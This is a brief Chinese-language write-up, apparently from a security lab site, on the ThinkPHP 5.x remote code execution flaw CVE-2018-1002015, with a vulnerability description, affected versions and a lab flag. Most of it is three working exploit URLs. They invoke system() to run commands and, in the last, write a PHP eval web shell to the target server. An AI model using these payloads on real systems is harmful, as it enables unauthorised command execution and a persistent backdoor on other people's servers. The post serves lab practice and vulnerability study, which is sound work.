【初级】thinkphp 命令执行

CVE-2018-1002015
漏洞描述:ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架。 ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。
影响版本:5.x < 5.1.31, <= 5.0.23

POC:

http://IP/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 
http://IP/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp
http://IP/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"])?^>>shell.php

漏洞复现

图片[1]-【初级】thinkphp 命令执行-NGC660 安全实验室
  • flag-{bmh47654b88-9985-401e-a146-1515d0ea3aca}
© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享